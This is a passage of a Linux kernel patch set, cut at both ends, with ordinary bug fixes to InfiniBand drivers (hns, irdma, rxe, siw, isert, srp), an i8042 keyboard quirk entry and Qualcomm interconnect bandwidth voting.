+ 	unsigned long num = 0;
+@@ -220,7 +236,7 @@ static int alloc_qpn(struct hns_roce_dev *hr_dev, struct hns_roce_qp *hr_qp)
+ 		num = 1;
+ 	} else {
+ 		mutex_lock(&qp_table->bank_mutex);
+-		bankid = get_least_load_bankid_for_qp(qp_table->bank);
++		bankid = get_least_load_bankid_for_qp(init_attr, qp_table->bank);
+ 
+ 		ret = alloc_qpn_with_bankid(&qp_table->bank[bankid], bankid,
+ 					    &num);
+@@ -1146,7 +1162,7 @@ static int hns_roce_create_qp_common(struct hns_roce_dev *hr_dev,
+ 		goto err_buf;
+ 	}
+ 
+-	ret = alloc_qpn(hr_dev, hr_qp);
++	ret = alloc_qpn(hr_dev, hr_qp, init_attr);
+ 	if (ret) {
+ 		ibdev_err(ibdev, "failed to alloc QPN, ret = %d.\n", ret);
+ 		goto err_qpn;
+diff --git a/drivers/infiniband/hw/irdma/ctrl.c b/drivers/infiniband/hw/irdma/ctrl.c
+index 6544c9c60b7db..d98bfb83c3b4b 100644
+--- a/drivers/infiniband/hw/irdma/ctrl.c
++++ b/drivers/infiniband/hw/irdma/ctrl.c
+@@ -1061,6 +1061,9 @@ static int irdma_sc_alloc_stag(struct irdma_sc_dev *dev,
+ 	u64 hdr;
+ 	enum irdma_page_size page_size;
+ 
++	if (!info->total_len && !info->all_memory)
++		return -EINVAL;
++
+ 	if (info->page_size == 0x40000000)
+ 		page_size = IRDMA_PAGE_SIZE_1G;
+ 	else if (info->page_size == 0x200000)
+@@ -1126,6 +1129,9 @@ static int irdma_sc_mr_reg_non_shared(struct irdma_sc_dev *dev,
+ 	u8 addr_type;
+ 	enum irdma_page_size page_size;
+ 
++	if (!info->total_len && !info->all_memory)
++		return -EINVAL;
++
+ 	if (info->page_size == 0x40000000)
+ 		page_size = IRDMA_PAGE_SIZE_1G;
+ 	else if (info->page_size == 0x200000)
+diff --git a/drivers/infiniband/hw/irdma/main.h b/drivers/infiniband/hw/irdma/main.h
+index e64205839d039..9cbe64311f985 100644
+--- a/drivers/infiniband/hw/irdma/main.h
++++ b/drivers/infiniband/hw/irdma/main.h
+@@ -236,7 +236,7 @@ struct irdma_qv_info {
+ 
+ struct irdma_qvlist_info {
+ 	u32 num_vectors;
+-	struct irdma_qv_info qv_info[1];
++	struct irdma_qv_info qv_info[];
+ };
+ 
+ struct irdma_gen_ops {
+diff --git a/drivers/infiniband/hw/irdma/type.h b/drivers/infiniband/hw/irdma/type.h
+index d6cb94dc744c5..1c7cbf7c67bed 100644
+--- a/drivers/infiniband/hw/irdma/type.h
++++ b/drivers/infiniband/hw/irdma/type.h
+@@ -1015,6 +1015,7 @@ struct irdma_allocate_stag_info {
+ 	bool remote_access:1;
+ 	bool use_hmc_fcn_index:1;
+ 	bool use_pf_rid:1;
++	bool all_memory:1;
+ 	u8 hmc_fcn_index;
+ };
+ 
+@@ -1042,6 +1043,7 @@ struct irdma_reg_ns_stag_info {
+ 	bool use_hmc_fcn_index:1;
+ 	u8 hmc_fcn_index;
+ 	bool use_pf_rid:1;
++	bool all_memory:1;
+ };
+ 
+ struct irdma_fast_reg_stag_info {
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index 6a8bb6ed4bf43..3b8b2341981ea 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -2557,7 +2557,8 @@ static int irdma_hw_alloc_stag(struct irdma_device *iwdev,
+ 			       struct irdma_mr *iwmr)
+ {
+ 	struct irdma_allocate_stag_info *info;
+-	struct irdma_pd *iwpd = to_iwpd(iwmr->ibmr.pd);
++	struct ib_pd *pd = iwmr->ibmr.pd;
++	struct irdma_pd *iwpd = to_iwpd(pd);
+ 	int status;
+ 	struct irdma_cqp_request *cqp_request;
+ 	struct cqp_cmds_info *cqp_info;
+@@ -2573,6 +2574,7 @@ static int irdma_hw_alloc_stag(struct irdma_device *iwdev,
+ 	info->stag_idx = iwmr->stag >> IRDMA_CQPSQ_STAG_IDX_S;
+ 	info->pd_id = iwpd->sc_pd.pd_id;
+ 	info->total_len = iwmr->len;
++	info->all_memory = pd->flags & IB_PD_UNSAFE_GLOBAL_RKEY;
+ 	info->remote_access = true;
+ 	cqp_info->cqp_cmd = IRDMA_OP_ALLOC_STAG;
+ 	cqp_info->post_sq = 1;
+@@ -2620,6 +2622,8 @@ static struct ib_mr *irdma_alloc_mr(struct ib_pd *pd, enum ib_mr_type mr_type,
+ 	iwmr->type = IRDMA_MEMREG_TYPE_MEM;
+ 	palloc = &iwpbl->pble_alloc;
+ 	iwmr->page_cnt = max_num_sg;
++	/* Use system PAGE_SIZE as the sg page sizes are unknown at this point */
++	iwmr->len = max_num_sg * PAGE_SIZE;
+ 	err_code = irdma_get_pble(iwdev->rf->pble_rsrc, palloc, iwmr->page_cnt,
+ 				  false);
+ 	if (err_code)
+@@ -2699,7 +2703,8 @@ static int irdma_hwreg_mr(struct irdma_device *iwdev, struct irdma_mr *iwmr,
+ {
+ 	struct irdma_pbl *iwpbl = &iwmr->iwpbl;
+ 	struct irdma_reg_ns_stag_info *stag_info;
+-	struct irdma_pd *iwpd = to_iwpd(iwmr->ibmr.pd);
++	struct ib_pd *pd = iwmr->ibmr.pd;
++	struct irdma_pd *iwpd = to_iwpd(pd);
+ 	struct irdma_pble_alloc *palloc = &iwpbl->pble_alloc;
+ 	struct irdma_cqp_request *cqp_request;
+ 	struct cqp_cmds_info *cqp_info;
+@@ -2718,6 +2723,7 @@ static int irdma_hwreg_mr(struct irdma_device *iwdev, struct irdma_mr *iwmr,
+ 	stag_info->total_len = iwmr->len;
+ 	stag_info->access_rights = irdma_get_mr_access(access);
+ 	stag_info->pd_id = iwpd->sc_pd.pd_id;
++	stag_info->all_memory = pd->flags & IB_PD_UNSAFE_GLOBAL_RKEY;
+ 	if (stag_info->access_rights & IRDMA_ACCESS_FLAGS_ZERO_BASED)
+ 		stag_info->addr_type = IRDMA_ADDR_TYPE_ZERO_BASED;
+ 	else
+@@ -4354,7 +4360,6 @@ static int irdma_query_ah(struct ib_ah *ibah, struct rdma_ah_attr *ah_attr)
+ 		ah_attr->grh.traffic_class = ah->sc_ah.ah_info.tc_tos;
+ 		ah_attr->grh.hop_limit = ah->sc_ah.ah_info.hop_ttl;
+ 		ah_attr->grh.sgid_index = ah->sgid_index;
+-		ah_attr->grh.sgid_index = ah->sgid_index;
+ 		memcpy(&ah_attr->grh.dgid, &ah->dgid,
+ 		       sizeof(ah_attr->grh.dgid));
+ 	}
+diff --git a/drivers/infiniband/sw/rxe/rxe_comp.c b/drivers/infiniband/sw/rxe/rxe_comp.c
+index fb0c008af78cc..d2a2501236174 100644
+--- a/drivers/infiniband/sw/rxe/rxe_comp.c
++++ b/drivers/infiniband/sw/rxe/rxe_comp.c
+@@ -118,7 +118,7 @@ void retransmit_timer(struct timer_list *t)
+ 
+ 	if (qp->valid) {
+ 		qp->comp.timeout = 1;
+-		rxe_run_task(&qp->comp.task, 1);
++		rxe_sched_task(&qp->comp.task);
+ 	}
+ }
+ 
+@@ -132,7 +132,10 @@ void rxe_comp_queue_pkt(struct rxe_qp *qp, struct sk_buff *skb)
+ 	if (must_sched != 0)
+ 		rxe_counter_inc(SKB_TO_PKT(skb)->rxe, RXE_CNT_COMPLETER_SCHED);
+ 
+-	rxe_run_task(&qp->comp.task, must_sched);
++	if (must_sched)
++		rxe_sched_task(&qp->comp.task);
++	else
++		rxe_run_task(&qp->comp.task);
+ }
+ 
+ static inline enum comp_state get_wqe(struct rxe_qp *qp,
+@@ -305,7 +308,7 @@ static inline enum comp_state check_ack(struct rxe_qp *qp,
+ 					qp->comp.psn = pkt->psn;
+ 					if (qp->req.wait_psn) {
+ 						qp->req.wait_psn = 0;
+-						rxe_run_task(&qp->req.task, 0);
++						rxe_run_task(&qp->req.task);
+ 					}
+ 				}
+ 				return COMPST_ERROR_RETRY;
+@@ -452,7 +455,7 @@ static void do_complete(struct rxe_qp *qp, struct rxe_send_wqe *wqe)
+ 	 */
+ 	if (qp->req.wait_fence) {
+ 		qp->req.wait_fence = 0;
+-		rxe_run_task(&qp->req.task, 0);
++		rxe_run_task(&qp->req.task);
+ 	}
+ }
+ 
+@@ -466,7 +469,7 @@ static inline enum comp_state complete_ack(struct rxe_qp *qp,
+ 		if (qp->req.need_rd_atomic) {
+ 			qp->comp.timeout_retry = 0;
+ 			qp->req.need_rd_atomic = 0;
+-			rxe_run_task(&qp->req.task, 0);
++			rxe_run_task(&qp->req.task);
+ 		}
+ 	}
+ 
+@@ -512,7 +515,7 @@ static inline enum comp_state complete_wqe(struct rxe_qp *qp,
+ 
+ 		if (qp->req.wait_psn) {
+ 			qp->req.wait_psn = 0;
+-			rxe_run_task(&qp->req.task, 1);
++			rxe_sched_task(&qp->req.task);
+ 		}
+ 	}
+ 
+@@ -646,7 +649,7 @@ int rxe_completer(void *arg)
+ 
+ 			if (qp->req.wait_psn) {
+ 				qp->req.wait_psn = 0;
+-				rxe_run_task(&qp->req.task, 1);
++				rxe_sched_task(&qp->req.task);
+ 			}
+ 
+ 			state = COMPST_DONE;
+@@ -714,7 +717,7 @@ int rxe_completer(void *arg)
+ 							RXE_CNT_COMP_RETRY);
+ 					qp->req.need_retry = 1;
+ 					qp->comp.started_retry = 1;
+-					rxe_run_task(&qp->req.task, 0);
++					rxe_run_task(&qp->req.task);
+ 				}
+ 				goto done;
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_net.c b/drivers/infiniband/sw/rxe/rxe_net.c
+index 65d16024b3bf6..719432808a063 100644
+--- a/drivers/infiniband/sw/rxe/rxe_net.c
++++ b/drivers/infiniband/sw/rxe/rxe_net.c
+@@ -348,7 +348,7 @@ static void rxe_skb_tx_dtor(struct sk_buff *skb)
+ 
+ 	if (unlikely(qp->need_req_skb &&
+ 		     skb_out < RXE_INFLIGHT_SKBS_PER_QP_LOW))
+-		rxe_run_task(&qp->req.task, 1);
++		rxe_sched_task(&qp->req.task);
+ 
+ 	rxe_put(qp);
+ }
+@@ -435,7 +435,7 @@ int rxe_xmit_packet(struct rxe_qp *qp, struct rxe_pkt_info *pkt,
+ 	if ((qp_type(qp) != IB_QPT_RC) &&
+ 	    (pkt->mask & RXE_END_MASK)) {
+ 		pkt->wqe->state = wqe_state_done;
+-		rxe_run_task(&qp->comp.task, 1);
++		rxe_sched_task(&qp->comp.task);
+ 	}
+ 
+ 	rxe_counter_inc(rxe, RXE_CNT_SENT_PKTS);
+diff --git a/drivers/infiniband/sw/rxe/rxe_qp.c b/drivers/infiniband/sw/rxe/rxe_qp.c
+index 59b2024b34ef4..709c63e9773c5 100644
+--- a/drivers/infiniband/sw/rxe/rxe_qp.c
++++ b/drivers/infiniband/sw/rxe/rxe_qp.c
+@@ -539,10 +539,10 @@ static void rxe_qp_drain(struct rxe_qp *qp)
+ 		if (qp->req.state != QP_STATE_DRAINED) {
+ 			qp->req.state = QP_STATE_DRAIN;
+ 			if (qp_type(qp) == IB_QPT_RC)
+-				rxe_run_task(&qp->comp.task, 1);
++				rxe_sched_task(&qp->comp.task);
+ 			else
+ 				__rxe_do_task(&qp->comp.task);
+-			rxe_run_task(&qp->req.task, 1);
++			rxe_sched_task(&qp->req.task);
+ 		}
+ 	}
+ }
+@@ -556,13 +556,13 @@ void rxe_qp_error(struct rxe_qp *qp)
+ 	qp->attr.qp_state = IB_QPS_ERR;
+ 
+ 	/* drain work and packet queues */
+-	rxe_run_task(&qp->resp.task, 1);
++	rxe_sched_task(&qp->resp.task);
+ 
+ 	if (qp_type(qp) == IB_QPT_RC)
+-		rxe_run_task(&qp->comp.task, 1);
++		rxe_sched_task(&qp->comp.task);
+ 	else
+ 		__rxe_do_task(&qp->comp.task);
+-	rxe_run_task(&qp->req.task, 1);
++	rxe_sched_task(&qp->req.task);
+ }
+ 
+ /* called by the modify qp verb */
+diff --git a/drivers/infiniband/sw/rxe/rxe_req.c b/drivers/infiniband/sw/rxe/rxe_req.c
+index f637712079705..2ace1007a4195 100644
+--- a/drivers/infiniband/sw/rxe/rxe_req.c
++++ b/drivers/infiniband/sw/rxe/rxe_req.c
+@@ -105,7 +105,7 @@ void rnr_nak_timer(struct timer_list *t)
+ 	/* request a send queue retry */
+ 	qp->req.need_retry = 1;
+ 	qp->req.wait_for_rnr_timer = 0;
+-	rxe_run_task(&qp->req.task, 1);
++	rxe_sched_task(&qp->req.task);
+ }
+ 
+ static struct rxe_send_wqe *req_next_wqe(struct rxe_qp *qp)
+@@ -529,10 +529,11 @@ static void save_state(struct rxe_send_wqe *wqe,
+ 		       struct rxe_send_wqe *rollback_wqe,
+ 		       u32 *rollback_psn)
+ {
+-	rollback_wqe->state     = wqe->state;
++	rollback_wqe->state = wqe->state;
+ 	rollback_wqe->first_psn = wqe->first_psn;
+-	rollback_wqe->last_psn  = wqe->last_psn;
+-	*rollback_psn		= qp->req.psn;
++	rollback_wqe->last_psn = wqe->last_psn;
++	rollback_wqe->dma = wqe->dma;
++	*rollback_psn = qp->req.psn;
+ }
+ 
+ static void rollback_state(struct rxe_send_wqe *wqe,
+@@ -540,10 +541,11 @@ static void rollback_state(struct rxe_send_wqe *wqe,
+ 			   struct rxe_send_wqe *rollback_wqe,
+ 			   u32 rollback_psn)
+ {
+-	wqe->state     = rollback_wqe->state;
++	wqe->state = rollback_wqe->state;
+ 	wqe->first_psn = rollback_wqe->first_psn;
+-	wqe->last_psn  = rollback_wqe->last_psn;
+-	qp->req.psn    = rollback_psn;
++	wqe->last_psn = rollback_wqe->last_psn;
++	wqe->dma = rollback_wqe->dma;
++	qp->req.psn = rollback_psn;
+ }
+ 
+ static void update_state(struct rxe_qp *qp, struct rxe_pkt_info *pkt)
+@@ -608,7 +610,7 @@ static int rxe_do_local_ops(struct rxe_qp *qp, struct rxe_send_wqe *wqe)
+ 	 * which can lead to a deadlock. So go ahead and complete
+ 	 * it now.
+ 	 */
+-	rxe_run_task(&qp->comp.task, 1);
++	rxe_sched_task(&qp->comp.task);
+ 
+ 	return 0;
+ }
+@@ -733,7 +735,7 @@ int rxe_requester(void *arg)
+ 						       qp->req.wqe_index);
+ 			wqe->state = wqe_state_done;
+ 			wqe->status = IB_WC_SUCCESS;
+-			rxe_run_task(&qp->comp.task, 0);
++			rxe_run_task(&qp->comp.task);
+ 			goto done;
+ 		}
+ 		payload = mtu;
+@@ -746,6 +748,9 @@ int rxe_requester(void *arg)
+ 	pkt.mask = rxe_opcode[opcode].mask;
+ 	pkt.wqe = wqe;
+ 
++	/* save wqe state before we build and send packet */
++	save_state(wqe, qp, &rollback_wqe, &rollback_psn);
++
+ 	av = rxe_get_av(&pkt, &ah);
+ 	if (unlikely(!av)) {
+ 		pr_err("qp#%d Failed no address vector\n", qp_num(qp));
+@@ -778,29 +783,29 @@ int rxe_requester(void *arg)
+ 	if (ah)
+ 		rxe_put(ah);
+ 
+-	/*
+-	 * To prevent a race on wqe access between requester and completer,
+-	 * wqe members state and psn need to be set before calling
+-	 * rxe_xmit_packet().
+-	 * Otherwise, completer might initiate an unjustified retry flow.
+-	 */
+-	save_state(wqe, qp, &rollback_wqe, &rollback_psn);
++	/* update wqe state as though we had sent it */
+ 	update_wqe_state(qp, wqe, &pkt);
+ 	update_wqe_psn(qp, wqe, &pkt, payload);
+ 
+ 	err = rxe_xmit_packet(qp, &pkt, skb);
+ 	if (err) {
+-		qp->need_req_skb = 1;
++		if (err != -EAGAIN) {
++			wqe->status = IB_WC_LOC_QP_OP_ERR;
++			goto err;
++		}
+ 
++		/* the packet was dropped so reset wqe to the state
++		 * before we sent it so we can try to resend
++		 */
+ 		rollback_state(wqe, qp, &rollback_wqe, rollback_psn);
+ 
+-		if (err == -EAGAIN) {
+-			rxe_run_task(&qp->req.task, 1);
+-			goto exit;
+-		}
++		/* force a delay until the dropped packet is freed and
++		 * the send queue is drained below the low water mark
++		 */
++		qp->need_req_skb = 1;
+ 
+-		wqe->status = IB_WC_LOC_QP_OP_ERR;
+-		goto err;
++		rxe_sched_task(&qp->req.task);
++		goto exit;
+ 	}
+ 
+ 	update_state(qp, &pkt);
+@@ -817,7 +822,7 @@ err:
+ 	qp->req.wqe_index = queue_next_index(qp->sq.queue, qp->req.wqe_index);
+ 	wqe->state = wqe_state_error;
+ 	qp->req.state = QP_STATE_ERROR;
+-	rxe_run_task(&qp->comp.task, 0);
++	rxe_run_task(&qp->comp.task);
+ exit:
+ 	ret = -EAGAIN;
+ out:
+diff --git a/drivers/infiniband/sw/rxe/rxe_resp.c b/drivers/infiniband/sw/rxe/rxe_resp.c
+index 9f65c346d8432..a45202cecf2d7 100644
+--- a/drivers/infiniband/sw/rxe/rxe_resp.c
++++ b/drivers/infiniband/sw/rxe/rxe_resp.c
+@@ -91,7 +91,10 @@ void rxe_resp_queue_pkt(struct rxe_qp *qp, struct sk_buff *skb)
+ 	must_sched = (pkt->opcode == IB_OPCODE_RC_RDMA_READ_REQUEST) ||
+ 			(skb_queue_len(&qp->req_pkts) > 1);
+ 
+-	rxe_run_task(&qp->resp.task, must_sched);
++	if (must_sched)
++		rxe_sched_task(&qp->resp.task);
++	else
++		rxe_run_task(&qp->resp.task);
+ }
+ 
+ static inline enum resp_states get_req(struct rxe_qp *qp,
+diff --git a/drivers/infiniband/sw/rxe/rxe_task.c b/drivers/infiniband/sw/rxe/rxe_task.c
+index 182d0532a8ab9..446ee2c3d3813 100644
+--- a/drivers/infiniband/sw/rxe/rxe_task.c
++++ b/drivers/infiniband/sw/rxe/rxe_task.c
+@@ -127,15 +127,20 @@ void rxe_cleanup_task(struct rxe_task *task)
+ 	tasklet_kill(&task->tasklet);
+ }
+ 
+-void rxe_run_task(struct rxe_task *task, int sched)
++void rxe_run_task(struct rxe_task *task)
+ {
+ 	if (task->destroyed)
+ 		return;
+ 
+-	if (sched)
+-		tasklet_schedule(&task->tasklet);
+-	else
+-		rxe_do_task(&task->tasklet);
++	rxe_do_task(&task->tasklet);
++}
++
++void rxe_sched_task(struct rxe_task *task)
++{
++	if (task->destroyed)
++		return;
++
++	tasklet_schedule(&task->tasklet);
+ }
+ 
+ void rxe_disable_task(struct rxe_task *task)
+diff --git a/drivers/infiniband/sw/rxe/rxe_task.h b/drivers/infiniband/sw/rxe/rxe_task.h
+index b3dfd970d1dc6..590b1c1d7e7ca 100644
+--- a/drivers/infiniband/sw/rxe/rxe_task.h
++++ b/drivers/infiniband/sw/rxe/rxe_task.h
+@@ -52,10 +52,9 @@ int __rxe_do_task(struct rxe_task *task);
+  */
+ void rxe_do_task(struct tasklet_struct *t);
+ 
+-/* run a task, else schedule it to run as a tasklet, The decision
+- * to run or schedule tasklet is based on the parameter sched.
+- */
+-void rxe_run_task(struct rxe_task *task, int sched);
++void rxe_run_task(struct rxe_task *task);
++
++void rxe_sched_task(struct rxe_task *task);
+ 
+ /* keep a task from scheduling */
+ void rxe_disable_task(struct rxe_task *task);
+diff --git a/drivers/infiniband/sw/rxe/rxe_verbs.c b/drivers/infiniband/sw/rxe/rxe_verbs.c
+index be13bcb4cc406..065717c11cba5 100644
+--- a/drivers/infiniband/sw/rxe/rxe_verbs.c
++++ b/drivers/infiniband/sw/rxe/rxe_verbs.c
+@@ -678,9 +678,9 @@ static int rxe_post_send_kernel(struct rxe_qp *qp, const struct ib_send_wr *wr,
+ 		wr = next;
+ 	}
+ 
+-	rxe_run_task(&qp->req.task, 1);
++	rxe_sched_task(&qp->req.task);
+ 	if (unlikely(qp->req.state == QP_STATE_ERROR))
+-		rxe_run_task(&qp->comp.task, 1);
++		rxe_sched_task(&qp->comp.task);
+ 
+ 	return err;
+ }
+@@ -702,7 +702,7 @@ static int rxe_post_send(struct ib_qp *ibqp, const struct ib_send_wr *wr,
+ 
+ 	if (qp->is_user) {
+ 		/* Utilize process context to do protocol processing */
+-		rxe_run_task(&qp->req.task, 0);
++		rxe_run_task(&qp->req.task);
+ 		return 0;
+ 	} else
+ 		return rxe_post_send_kernel(qp, wr, bad_wr);
+@@ -740,7 +740,7 @@ static int rxe_post_recv(struct ib_qp *ibqp, const struct ib_recv_wr *wr,
+ 	spin_unlock_irqrestore(&rq->producer_lock, flags);
+ 
+ 	if (qp->resp.state == QP_STATE_ERROR)
+-		rxe_run_task(&qp->resp.task, 1);
++		rxe_sched_task(&qp->resp.task);
+ 
+ 	return err;
+ }
+diff --git a/drivers/infiniband/sw/siw/siw.h b/drivers/infiniband/sw/siw/siw.h
+index 2f3a9cda3850f..8b4a710b82bc1 100644
+--- a/drivers/infiniband/sw/siw/siw.h
++++ b/drivers/infiniband/sw/siw/siw.h
+@@ -74,6 +74,7 @@ struct siw_device {
+ 
+ 	u32 vendor_part_id;
+ 	int numa_node;
++	char raw_gid[ETH_ALEN];
+ 
+ 	/* physical port state (only one port per device) */
+ 	enum ib_port_state state;
+diff --git a/drivers/infiniband/sw/siw/siw_cm.c b/drivers/infiniband/sw/siw/siw_cm.c
+index f88d2971c2c63..552d8271e423b 100644
+--- a/drivers/infiniband/sw/siw/siw_cm.c
++++ b/drivers/infiniband/sw/siw/siw_cm.c
+@@ -1496,7 +1496,6 @@ error:
+ 
+ 		cep->cm_id = NULL;
+ 		id->rem_ref(id);
+-		siw_cep_put(cep);
+ 
+ 		qp->cep = NULL;
+ 		siw_cep_put(cep);
+diff --git a/drivers/infiniband/sw/siw/siw_main.c b/drivers/infiniband/sw/siw/siw_main.c
+index 65b5cda5457ba..f45600d169ae7 100644
+--- a/drivers/infiniband/sw/siw/siw_main.c
++++ b/drivers/infiniband/sw/siw/siw_main.c
+@@ -75,8 +75,7 @@ static int siw_device_register(struct siw_device *sdev, const char *name)
+ 		return rv;
+ 	}
+ 
+-	siw_dbg(base_dev, "HWaddr=%pM\n", sdev->netdev->dev_addr);
+-
++	siw_dbg(base_dev, "HWaddr=%pM\n", sdev->raw_gid);
+ 	return 0;
+ }
+ 
+@@ -313,24 +312,19 @@ static struct siw_device *siw_device_create(struct net_device *netdev)
+ 		return NULL;
+ 
+ 	base_dev = &sdev->base_dev;
+-
+ 	sdev->netdev = netdev;
+ 
+-	if (netdev->type != ARPHRD_LOOPBACK && netdev->type != ARPHRD_NONE) {
+-		addrconf_addr_eui48((unsigned char *)&base_dev->node_guid,
+-				    netdev->dev_addr);
++	if (netdev->addr_len) {
++		memcpy(sdev->raw_gid, netdev->dev_addr,
++		       min_t(unsigned int, netdev->addr_len, ETH_ALEN));
+ 	} else {
+ 		/*
+-		 * This device does not have a HW address,
+-		 * but connection mangagement lib expects gid != 0
++		 * This device does not have a HW address, but
++		 * connection management requires a unique gid.
+ 		 */
+-		size_t len = min_t(size_t, strlen(base_dev->name), 6);
+-		char addr[6] = { };
+-
+-		memcpy(addr, base_dev->name, len);
+-		addrconf_addr_eui48((unsigned char *)&base_dev->node_guid,
+-				    addr);
++		eth_random_addr(sdev->raw_gid);
+ 	}
++	addrconf_addr_eui48((u8 *)&base_dev->node_guid, sdev->raw_gid);
+ 
+ 	base_dev->uverbs_cmd_mask |= BIT_ULL(IB_USER_VERBS_CMD_POST_SEND);
+ 
+diff --git a/drivers/infiniband/sw/siw/siw_verbs.c b/drivers/infiniband/sw/siw/siw_verbs.c
+index 906fde1a2a0de..193f7d58d3845 100644
+--- a/drivers/infiniband/sw/siw/siw_verbs.c
++++ b/drivers/infiniband/sw/siw/siw_verbs.c
+@@ -157,7 +157,7 @@ int siw_query_device(struct ib_device *base_dev, struct ib_device_attr *attr,
+ 	attr->vendor_part_id = sdev->vendor_part_id;
+ 
+ 	addrconf_addr_eui48((u8 *)&attr->sys_image_guid,
+-			    sdev->netdev->dev_addr);
++			    sdev->raw_gid);
+ 
+ 	return 0;
+ }
+@@ -218,7 +218,7 @@ int siw_query_gid(struct ib_device *base_dev, u32 port, int idx,
+ 
+ 	/* subnet_prefix == interface_id == 0; */
+ 	memset(gid, 0, sizeof(*gid));
+-	memcpy(&gid->raw[0], sdev->netdev->dev_addr, 6);
++	memcpy(gid->raw, sdev->raw_gid, ETH_ALEN);
+ 
+ 	return 0;
+ }
+@@ -1494,7 +1494,7 @@ int siw_map_mr_sg(struct ib_mr *base_mr, struct scatterlist *sl, int num_sle,
+ 
+ 	if (pbl->max_buf < num_sle) {
+ 		siw_dbg_mem(mem, "too many SGE's: %d > %d\n",
+-			    mem->pbl->max_buf, num_sle);
++			    num_sle, pbl->max_buf);
+ 		return -ENOMEM;
+ 	}
+ 	for_each_sg(sl, slp, num_sle, i) {
+diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c
+index a7fef3ea77fe3..a02a3caeaa4e7 100644
+--- a/drivers/infiniband/ulp/isert/ib_isert.c
++++ b/drivers/infiniband/ulp/isert/ib_isert.c
+@@ -2571,6 +2571,8 @@ static void isert_wait_conn(struct iscsit_conn *conn)
+ 	isert_put_unsol_pending_cmds(conn);
+ 	isert_wait4cmds(conn);
+ 	isert_wait4logout(isert_conn);
++
++	queue_work(isert_release_wq, &isert_conn->release_work);
+ }
+ 
+ static void isert_free_conn(struct iscsit_conn *conn)
+diff --git a/drivers/infiniband/ulp/srp/ib_srp.c b/drivers/infiniband/ulp/srp/ib_srp.c
+index b4d6a4a5ae81e..a7580c4855fec 100644
+--- a/drivers/infiniband/ulp/srp/ib_srp.c
++++ b/drivers/infiniband/ulp/srp/ib_srp.c
+@@ -1984,12 +1984,8 @@ static void srp_process_rsp(struct srp_rdma_ch *ch, struct srp_rsp *rsp)
+ 
+ 		if (unlikely(rsp->flags & SRP_RSP_FLAG_DIUNDER))
+ 			scsi_set_resid(scmnd, be32_to_cpu(rsp->data_in_res_cnt));
+-		else if (unlikely(rsp->flags & SRP_RSP_FLAG_DIOVER))
+-			scsi_set_resid(scmnd, -be32_to_cpu(rsp->data_in_res_cnt));
+ 		else if (unlikely(rsp->flags & SRP_RSP_FLAG_DOUNDER))
+ 			scsi_set_resid(scmnd, be32_to_cpu(rsp->data_out_res_cnt));
+-		else if (unlikely(rsp->flags & SRP_RSP_FLAG_DOOVER))
+-			scsi_set_resid(scmnd, -be32_to_cpu(rsp->data_out_res_cnt));
+ 
+ 		srp_free_req(ch, req, scmnd,
+ 			     be32_to_cpu(rsp->req_lim_delta));
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index 028e45bd050bf..1724d6cb8649d 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -1281,6 +1281,13 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
++	/* See comment on TUXEDO InfinityBook S17 Gen6 / Clevo NS70MU above */
++	{
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "PD5x_7xPNP_PNR_PNN_PNT"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOAUX)
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "X170SM"),
+diff --git a/drivers/interconnect/qcom/bcm-voter.c b/drivers/interconnect/qcom/bcm-voter.c
+index d5f2a6b5376bd..a2d437a05a11f 100644
+--- a/drivers/interconnect/qcom/bcm-voter.c
++++ b/drivers/interconnect/qcom/bcm-voter.c
+@@ -58,6 +58,36 @@ static u64 bcm_div(u64 num, u32 base)
+ 	return num;
+ }
+ 
++/* BCMs with enable_mask use one-hot-encoding for on/off signaling */
++static void bcm_aggregate_mask(struct qcom_icc_bcm *bcm)
++{
++	struct qcom_icc_node *node;
++	int bucket, i;
++
++	for (bucket = 0; bucket < QCOM_ICC_NUM_BUCKETS; bucket++) {
++		bcm->vote_x[bucket] = 0;
++		bcm->vote_y[bucket] = 0;
++
++		for (i = 0; i < bcm->num_nodes; i++) {
++			node = bcm->nodes[i];
++
++			/* If any vote in this bucket exists, keep the BCM enabled */
++			if (node->sum_avg[bucket] || node->max_peak[bucket]) {
++				bcm->vote_x[bucket] = 0;
++				bcm->vote_y[bucket] = bcm->enable_mask;
++				break;
++			}
++		}
++	}
++
++	if (bcm->keepalive) {
++		bcm->vote_x[QCOM_ICC_BUCKET_AMC] = bcm->enable_mask;
++		bcm->vote_x[QCOM_ICC_BUCKET_WAKE] = bcm->enable_mask;
++		bcm->vote_y[QCOM_ICC_BUCKET_AMC] = bcm->enable_mask;
++		bcm->vote_y[QCOM_ICC_BUCKET_WAKE] = bcm->enable_mask;
++	}
++}
++
+ static void bcm_aggregate(struct qcom_icc_bcm *bcm)
+ {
+ 	struct qcom_icc_node *node;
+@@ -83,11 +113,6 @@ static void bcm_aggregate(struct qcom_icc_bcm *bcm)
+ 
+ 		temp = agg_peak[bucket] * bcm->vote_scale;
+ 		bcm->vote_y[bucket] = bcm_div(temp, bcm->aux_data.unit);
+-
+-		if (bcm->enable_mask && (bcm->vote_x[bucket] || bcm->vote_y[bucket])) {
+-			bcm->vote_x[bucket] = 0;
+-			bcm->vote_y[bucket] = bcm->enable_mask;
+-		}
+ 	}
+ 
+ 	if (bcm->keepalive && bcm->vote_x[QCOM_ICC_BUCKET_AMC] == 0 &&
+@@ -260,8 +285,12 @@ int qcom_icc_bcm_voter_commit(struct bcm_voter *voter)
+ 		return 0;
+ 
+ 	mutex_lock(&voter->lock);
+-	list_for_each_entry(bcm, &voter->commit_list, list)
+-		bcm_aggregate(bcm);
++	list_for_each_entry(bcm, &voter->commit_list, list) {
++		if (bcm->enable_mask)
++			bcm_aggregate_mask(bcm);
++		else
++			bcm_aggregate(bcm);
++	}
+ 
